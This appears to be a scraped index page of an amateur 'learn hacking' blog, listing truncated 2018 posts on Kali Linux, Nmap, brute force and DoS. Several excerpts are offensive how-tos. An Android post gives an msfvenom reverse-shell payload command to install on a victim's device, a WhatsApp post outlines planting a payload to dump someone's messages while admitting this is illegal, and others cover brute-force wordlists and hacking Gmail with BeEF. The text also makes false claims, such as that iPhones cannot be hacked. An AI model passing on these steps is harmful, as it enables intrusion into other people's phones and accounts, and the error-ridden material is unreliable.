RESPBERRY PI 3 IT IS THE SMALLEST PC EVER YOU CAN BUY THE LINK PROVIDED UP. YOU CAN MAKE YOUR HACKING. YOU JUST NEED IT TO BUY . IF YOU CANT BUY LAPTOP OR PC JUST YOU CAN BUY IT . AS SOON AS POSSIBLE I WILL POST THAT HOW TO MAKE COMPUTER WITH RESPBERRY PI 3 SPECIFICATION:- 1.2GHz 64-bit quad-core ARMv8 CPU,...
BUY YOUR OWN FAKE TRAFFIC.
September 25, 2018 / BY learn hacking
HERE YOU CAN GET FAKE TRAFFIC FOR FREE 1. MAIL ME 2. SYNTAX :- FAKE TRAFFIC <YOUR URL> <HOW MUCH YOU NEED>...
WHAT IS DOS ATTACK ?
September 25, 2018 / BY learn hacking
IT is a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic.In simple language it send too much traffic on website host by this speed becomes slow. it can be on the basis of demanding money or ETC. visitors speed will be get slow and creats problem for server. some dos attack tools...
HOW TO CREAT PASSWORD(WORDLIST) FOR BRUTEFORCE ATTACK
August 25, 2018 / BY learn hacking
HEY, GUYS TODAY I AM GOING TO TELL YOU THAT HOW TO CREAT WORDLIST FOR BRUTEFORCE ATTACK SO FOLLOW THESE STEPS 1. RUN YOUR KALI LINUX 2. RUN CRUNCH(APPLICATION>PASSWORD ATTACK>CRUNCH) 3. SYNTAX SIMPLE ONE :- CRUNCH (min no. ) (max no. ) ex. crunch 4 8 OTHER ONE :- crunch (min no. ) (max no.) -o (output dictionary) example crunch 6 8 1234567890...
HOW TO HACK WHATSAPP (SOCIAL ENGINEERING ) (EXPLANATION)
August 12, 2018 / BY learn hacking
SO, YOU WANTS TO HACK WHATSAPP BUT THIS IS NOT LEAGLE . TODAY I WILL NOT SHOW THE PRACTICAL TODAY THERE IS ONLY EXPLAINTION . GET STATRTED FIRST SEND SEND THE PAYLOAD IN DEVICE. THE TRY TO LOGIN INTO WHATS APP MEANS ENTER THE PHONE NO. . SO AFTER SENDING , INSTALLING THE PAYLOAD AND LOGIN THE PHONE NO. DUMP THE MASSAGES . AND SEE...
HOW TO PROTECT USB DRIVE FORM VIRUSES
August 05, 2018 / BY learn hacking
IF YOU NOT WANT TO LEAK OR LOSS YOUR DATA FROM YOUR USB DRIVE THEN FOLLOW THESE STEPS 1. PLUG IN YOUR USB DRIVE 2. PASTE YOUR ALL DATA IN IT 3.THEN OPEN RUN AND TYPE CDM 4. IN CMD TYPE diskpart 5. TYPE list disk( all connected list will be appear) 6. TYPE disk ( disk no.) 7.TYPE attributes disk set readonly...
HOW TO HACK GOOGLE ACCOUNT USING BEEF
July 29, 2018 / BY learn hacking
beEF IN PREVIOUS POST I SAYS THAT I WILL POST THAT HOW TO USE beEF SO TODAY I AM GOING TO TELL YOU HOW TO HACK GMAIL ACCOUNT USING BEEF ATTACK ...
CAN APPLE IPHONE CAN BE HACKED?
July 27, 2018 / BY learn hacking
PEOPLE WHO DON'T USING I PHONE I CAN TELL THEM I PHONE CAN'T BE HACKED BECAUSE THE PAYLOAD CAN'T BE INSTALLED IN I PHONE . BEEF ATTACK IS ALSO FAILED IN I PHONE IF YOU DON'T KNOW ABOUT BEEF ATTACK AS SOON AS POSSIBLE I WILL POST ON MY BLOG . SO SUBSCRIBE MY BLOG . I HAVE TRIED ON MY PHONE BEEF HAD BEEN FAIILED . IF...
HOW TO HACK ANDROID ?
July 17, 2018 / BY learn hacking
NOW , I AM GOING TO USE SOCIAL ENGINEERING TRICK AS SOON AS POSSIBLE I WILL ALSO POST FOR WHATSAPP HACKING NOTE:: THIS POST IS ONLY FOR EDUCATION FOLLOW THESE STEPS 1. RUN YOUR KALI LINUX 2. OPEN YOUR TERMINAL 3. TYPE COMMAND msfvenom -p android/meterpreter/reverse_tcp lhost='your ip' lport='your port' R > name.apk 4. YOUR PAYLOAD HAD BEEN CREATED AND INSTALL THAT PAYLOAD...
WHAT IS SOCIAL ENGINEERING?
July 14, 2018 / BY learn hacking
SOCIAL ENGINEERING SOCIAL ENGINEERING IS NOT MEANS THAT HACKING THOUGH WIFI , BLUETOOTH (SOON I WILL UPLOAD POST) THE HACKERS HACK YOUR MIND IN SIMPLE LANGUAGE THEY USE FOLLOWING TRICKS 1. HACKER CREATE FAKE FB,INSTAGRAM,OR GMAIL PAGE IN WHICH YOU LOG IN AND YOUR PASSWORD AND USERNAME WILL GO TO THE HACKER 2. HACKER CREATE A PAYLOAD AND UPLOAD ON CLOUD AND SAYS YOU TO...
HOW TO DO PENTESTING ?
July 08, 2018 / BY learn hacking
window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-121973311-1'); THIS POST IS ONLY FOR EDUCATIONAL PERPOUS THERE IS 2 TOOLS IN KALI LINUX FOR PENTESTING NMAP I HAVE ALREADY UPLOADED POST IN MY BLOG see here NIKTO NIKTO IS THE BEST AND EASY METHOD FOR PENTESTING. IT IS ALREADY INSTALLED IN KALI LINUX FOR SQLMAP ATTACK USE THIS OPEN NIKTO...
WHAT IS BRUTEFORCE ATTACK ?
July 06, 2018 / BY learn hacking
BRUTEFORCE BRUTEFORCE IS THE TRAIL METHOD OF HACKING. IT IS USED FOR PASSWORD CRACKING. IT TRY ALL THE PASSWORD CONTAIN IN WORDLIST. IT IS NOT SURE ALWAYS WILL BE GOING TO CRACK BECAUSE WHEN THE VICTIMS PASSWORD NOT CONTAINED IN WORDLIST IT WILL BE NOT GOING TO CRACK. IN SOME TIME I WILL POST ( WHO TO USE BRUTEFORCE OR FB CRACKING OR...
HOW TO MULTI BOOT USB
July 04, 2018 / BY learn hacking
USING MULTIBOOTUSB DOWNLOAD MULTI BOOT USB HERE OPEN MULTI BOOT USB CONNECT YOUR USB CLICK ON BROWSE AND BOROW YOUR ISO IMAGE THEN CLICK ON INSTALL DISTRO (YOUR ONE ISO HAD BEEN INSTALLED ) FOR ONE MORE ISO INSTALLATION AGAIN FOLLOW THESE STEPS ...
black hat vs white hat
July 01, 2018 / BY learn hacking
START HACKING WITH ANDROID
June 30, 2018 / BY learn hacking
window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-121694575-1'); I YOU WHATS TO BE AN ETHICAL HACKER BUT YOU CAN'T AFFORD PC OR LAPTOP . NO PROBLEM ! DOWNLOAD THE APK FORM GOOGLE PLAY STORE TERMUX IT CAN RUN ALL LINUX TEMINAL COMMANDS . YOU CAN TAKE YOUR FIRST STEP IN HACKING WITH TERMUX ...
what is anonymous ?
June 30, 2018 / BY learn hacking
ANONYMOUS IS THE HACKERS GROUP Who are against the government. it organized in 2003. they are black head hackers and they hack websites and give there opinion on hacked websites against government decision. it can be your neighbor also. THEY HIDE THERE ID'S TO DO INLEAGEL THINGS wikipedia:- Supporters have called the group "freedom fighters"[6] and digital Robin Hoods[7] while critics have described them as "a cyber...
NMAP - tutorial
June 27, 2018 / BY learn hacking
actually now i have started publishing hacking tutorial berore that is was basic things only lets start step1: start kali linux step2: open terminal step3: give command apt-get update step4: after completing open another terminal and give comand "namp http://example.com" and press enter results in front of you ...
how to get more Ghz on low end processor
June 27, 2018 / BY learn hacking
if your games are lagging but your all requirements are complete like ram GPU etc. but your proccesor is giving low ghz then follow these steps 1.click here to get throttle stop 2.extract the zip file 3.run throttle stop and it will show the following 'setting' clock modulation> check it to highest point chipset clock modulation> check...
WHAT,WHY,HOW NMAP
June 25, 2018 / BY learn hacking
WHAT IS NMAP? Nmap is scanner. in simple language it is website scanner. but according to the wikipedia it is used to discover hosts and services on a computer network, thus building a "map" of the network . its is used by beginner hacker . The software provides a number of features for probing computer networks, including host discovery and service and operating-system detection.are extensible by scripts that provide more advanced service detection]vulnerability detection,[3] and other...
GIT HUB _ REVIEW
June 25, 2018 / BY learn hacking
DON'T KNOW CODING BUT IF YOU KNOW NOT FINDING PLACE TO SHARE IT SEE MY FULL POST . HERE IS PLACE TO GET OR SHARE OVER THE INTERNET. IT IS ALSO CALLED AS HOME OVER 28 MILLION DEVELOPERS. IT IS MOSTLY USED BY SOFTWARE DEVELOPERS OR HACKERS. SOME HACKERS DO'T KNOW PYTHON SCRIPT SO THEY USE SHARED SCRIPT OF OTHER DEVELOPERS. GIT HUB OFFICIAL ...
MOST ANONYMOUS BROWSER ? TOR BROWSER - REVIEW- DOWNLOAD
June 25, 2018 / BY learn hacking
ARE YOU A HACKER AND SEARCHING FOR MOST ANONYMOUS BROWSER. SEE MY FULL POST FOR REVIW AND DOWNLOAD WHY YOU NEED ANONYMOUS BROWSER TOR? YOU NEED TO PROTECT YOU PROXY AND PREVENT THAT SOMESONE TO SEE YOUR INTERNET CONNECTION IN THAT CASE YOU NEED TOR BROWSER IT IS PRIVATE BROWSER DOWNLOAD LINKS BELOW WINDOW 32 AND 64 BIT MAC OS GNU/LINUX 64 BIT...
oracle VM Virtual box download
June 25, 2018 / BY learn hacking
oracle vm virtual box is a software to creat a virual computer means to creat a new computer in your computer. you can download by clicking here .if you are using a window os and wants to start hacking and don't wants to loss your data in that condition you can use virtual box. official website ...
kali live or virtual machine which is better?
June 25, 2018 / BY learn hacking
kali live: if you have low end pc you don't whats to use vm ware so you can boot kali linux in usb or dvd i will show the video down if you need help. in live booting there is no any loss of your window os data. but the data which you will save in kali...
download kali lunix ios
June 24, 2018 / BY learn hacking
kali lunix is an distribution of lunix it incloude many hacking tools view all next post to learn how to install kali lunix on vm ware ...
introducing VM WARE
June 24, 2018 / BY learn hacking
VMware Workstation Pro 14 VMware Workstation Pro is the industry standard for running multiple operating systems on a single Linux or Windows PC. Workstation 14 Pro improves on the leading desktop hypervisor with VMware Virtual Hardware Version 14 features, including: virtual network simulation, updated support for the latest Windows and Linux operating systems, and new virtualization-based security features. download now VMware ...
SMALLEST PC EVER - RESPBERRY PI 3 -
RESPBERRY PI 3 IT IS THE SMALLEST PC EVER YOU CAN BUY THE LINK PROVIDED UP. YOU CAN MAKE YOUR HACKING. YOU JUST NEED IT TO BUY . IF...
-
HEY, GUYS TODAY I AM GOING TO TELL YOU THAT HOW TO CREAT WORDLIST FOR BRUTEFORCE ATTACK SO FOLLOW THESE STEPS 1. RUN YOUR KALI LINUX ...
-
SO, YOU WANTS TO HACK WHATSAPP BUT THIS IS NOT LEAGLE . TODAY I WILL NOT SHOW THE PRACTICAL TODAY THERE IS ONLY EXPLAINTION . GET STATRTED...